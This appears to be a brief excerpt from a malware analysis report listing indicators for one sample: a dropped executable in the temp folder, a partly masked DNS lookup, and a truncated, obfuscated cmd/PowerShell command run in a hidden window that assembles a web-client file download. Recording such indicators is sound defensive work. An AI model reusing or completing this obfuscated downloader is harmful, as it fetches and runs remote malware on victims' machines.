Technical Information
- %TEMP%\cfupithy.exe
- DNS ASK co####tsites.com
- '<SYSTEM32>\cmd.exe' /c "powershell $kirumz='^com';$xboqti='^''\c';$qepgu='^-Ex';$ujmuzx='^-Ob';$umkuso='^$pa';$duha='^t).';$ykhad='^://';$cdadkikg='^.We';$yxymz='^nlo';$arafh='^adF';$ynganci='^ss ';$repgo='^ St';...' (with hidden window)